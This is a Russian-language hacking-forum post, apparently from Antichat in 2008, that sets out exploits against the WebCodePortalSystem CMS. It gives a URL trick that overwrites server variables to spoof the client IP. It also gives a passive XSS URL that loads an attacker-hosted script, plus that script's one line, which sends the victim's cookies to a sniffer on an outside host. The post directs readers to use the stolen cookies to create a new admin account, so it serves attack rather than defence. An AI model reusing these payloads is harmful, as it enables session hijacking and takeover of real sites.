Показать сообщение отдельно

  #19  
Старый 07.02.2008, 23:07
Grey
Познавший АНТИЧАТ
Регистрация: 10.06.2006
Сообщений: 1,113
С нами: 10483586

Репутация: 5826


По умолчанию

WebCodePortalSystem v.4.2.2 Еще одна Пассивная XSS

Цитата:
Сообщение от I-I()/Ib  
Перезапись системных переменных WCPS v.4.2.1
Чтож вот собственно и как юзать:
Код:
http://test2.ru/?_SER'VER[REMOTE_ADDR]=111.111.111.111
После такого обращения к системе, цмс будет "думать" что ваш IP равен "111.111.111.111".
Благодаря перезаписи переменных реализовал еще одну Пассивную XSS:

Код:
http://target.ru/php/wojs.php?_SE;RVER[HTTP_HOST]=site.ru/666.js?
* - не забудьте знак вопроса на конце
** - писать надо именно _SE;RVER, а не _SERVER.


site.ru - ваш хост
666.js - файл с содержимым скрипта:

Код:
document.location.replace("http://site.ru/sniff.php?c="+document.cookie);
Используйте снифер из поста #17 для создания нового админа.

P.S. в этой же скрипте wojs.php есть и другая действующая Пассивная XSS (из поста #10 все ещё не залатана, хотя версии новые выходили) - не скрипт, а прям сосредоточение уязвимостей))
 
Ответить с цитированием